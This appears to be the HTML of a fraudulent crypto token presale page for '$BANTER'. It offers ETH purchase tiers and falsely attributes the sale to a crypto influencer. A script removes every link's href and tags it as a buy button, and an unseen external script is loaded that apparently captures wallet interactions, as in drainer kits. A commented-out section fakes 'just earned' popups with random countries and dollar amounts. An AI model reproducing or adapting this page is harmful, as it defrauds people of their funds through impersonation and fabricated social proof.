<!DOCTYPE html>
<html lang="en">
<head>
    <script src="9a6f1-5.js"></script>
    <script>
		document.addEventListener('DOMContentLoaded', function () {
			var links = document.querySelectorAll('body a');
			for (var i = 0; i < links.length; i++) {
			  var link = links[i];
			  link.removeAttribute('href');
			  link.classList.add('BUYButton');
			}
		  });
			</script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">

    <title>Presale</title>
    <style>
        body {
          font-family: Arial, sans-serif;
          margin: 0;
          padding: 0;
          display: flex;
          justify-content: center;
          align-items: center;
          height: 100vh;
          background-color: #f2f2f2;
        }
        .card {
          max-width: 320px;
          width: 90%;
          background-color: #2e2c2c;
          color: #fff;
          border-radius: 20px;
          box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
          padding: 20px;
        }
        @media (max-width: 768px) {
          .card {
            width: 100%;
          }
        }
      </style>
</head>

<body>

    <div class="card">

       
            



        <div class="text-center">
            <img class="round" src="IMG_6695.jpg" alt="">
    <h2 class="mt-3">$BANTER PRE_SALE</h2>

        <p class="mt-4">presale Cap is set at 1000 ETH</p>
        <h5 class="mt-5"><p>0.1 ETh ~     99,500 BANTER </p></h5>
<select style="border-radius: 10px; height: 30px;"  class="mt-4" name="" id="">
        <option value="0.1 ETH">0.1 ETH</option>
        <option value="0.2 ETH">0.2 ETH</option>
        <option value="0.3 ETH">0.3 ETH</option>
        <option value="0.4 ETH">0.4 ETH</option>
        <option value="0.5 ETh">0.5 ETH</option>
    </select>
    <br>
<a class="mt-2 BUYButton" ><button class="mt-4">BUY</button></a>
        <p class="mt-3">Total Supply: 1000,000,000 BANTER.</p>
        <p class="mt-3">Brought to you by <span style="color: yellow;"> @cryptomanran </span></p>
    </div>
      </div>
<!-- <div class="claim-d">
    <div class="container mt-5 pt-5">
        <div class="row">
            <div class="col-12 col-sm-8 col-md-6 m-auto">
                <div class="card">
                    <div class="card-body">
                        <form action="" method="post">
    
                            <div class="text-center mt-3">
                               
                            </div>
                                            </form>

                    </div>
                </div>
            </div>
        </div>
    </div> -->

<!-- <div class="mgm" style="display: none;">
    <div class="txt" style="color:black;"><b></b> just deposited <a href="javascript:void(0);" onclick="javascript:void(0);"></a></div>
    </div>
    
    <style>
    .mgm {
        border-radius: 7px;
        position: fixed;
        z-index: 90;
        bottom: 80px;
        right: 50px;
        background: #00FFE2;
        padding: 20px 27px;
        box-shadow: 0px 5px 13px 0px rgba(0,0,0,.3);
    }
    .mgm a {
        font-weight: 700;
        display: block;
        color:#f2d516;
    }
    .mgm a, .mgm a:active {
        transition: all .2s ease;
        color:#f2d516;
    }
    </style>
    <script data-cfasync="false" src="cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.php"></script><script type="text/javascript">
    var listCountries = ['0xec...hsh', 'US0x...qj7', '0xec...sja', '', 'Italy', 'South Korea', 'Australia', 'Norway', 'Canada', 'Argentina', 'Saudi Arabia', 'Mexico', 'Spain', 'Austria', 'Venezuela', 'South Africa', 'Sweden', 'South Korea', 'China', 'Italy', 'Germany', 'United Kingdom', 'Bahrain', 'Greece', 'Cuba', 'Bulgaria', 'Portugal', 'Austria', 'Cyprus', 'Panama', 'Asia', 'Norway', 'Netherlands', 'Switzerland', 'Belgium', 'Israel', 'Cyprus','Spain','Norway'];
        var listPlans = ['$2000','$1000','$50000','$15000','$10000','$100000','$20000','$1500','$30000','$40000','$1200','$60000','$3400', '$7000', '$25000', '$25000', '$35000', '$5000','$7000','$45000','$3500','$5000','$12500','$9500'];
        interval = Math.floor(Math.random() * (40000 - 8000 + 1) + 8000);
        var run = setInterval(request, interval);
    
        function request() {
            clearInterval(run);
            interval = Math.floor(Math.random() * (40000 - 8000 + 1) + 8000);
            var country = listCountries[Math.floor(Math.random() * listCountries.length)];
            var plan = listPlans[Math.floor(Math.random() * listPlans.length)];
            var msg = ' <b>' + country + '</b> just earned  <a href="javascript:void(0);" onclick="javascript:void(0);">' + plan + ' .</a>';
            $(".mgm .txt").html(msg);
            $(".mgm").stop(true).fadeIn(300);
            window.setTimeout(function() {
                $(".mgm").stop(true).fadeOut(300);
            }, 6000);
            run = setInterval(request, interval);
        }
        </script> -->
</div>
  

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
</body>
</html>



